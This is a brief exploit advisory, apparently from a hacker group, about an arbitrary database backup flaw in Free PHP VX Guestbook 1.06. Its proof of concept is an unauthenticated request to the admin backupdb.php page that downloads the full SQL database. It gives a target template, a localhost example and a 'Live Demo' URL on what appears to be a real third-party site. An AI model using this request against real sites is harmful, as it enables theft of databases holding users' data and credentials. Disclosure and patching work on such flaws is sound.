Free PHP VX Guestbook version 1.06 suffers from an arbitrary database backup vulnerability.
da44138ca67a43d9f17d691277fe74afc622cbb8ac4f78c2e808f3443bb5b1e7
###############################################################################################
[+] Free PHP VX Guestbook 1.06 Arbitrary Backup Database
[+] Discovered By SirGod
[+] wWw.MorTal-TeaM.OrG
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke
################################################################################################
[+] Arbitrary Backup Database
Follow the example and the database download will begin :
[dbname]_db_backup.sql
PoC :
http://[target]/[path]/admin/backupdb.php
Example :
http://127.0.0.1/book/admin/backupdb.php
Live Demo :
http://phpversion.com/book/admin/backupdb.php
################################################################################################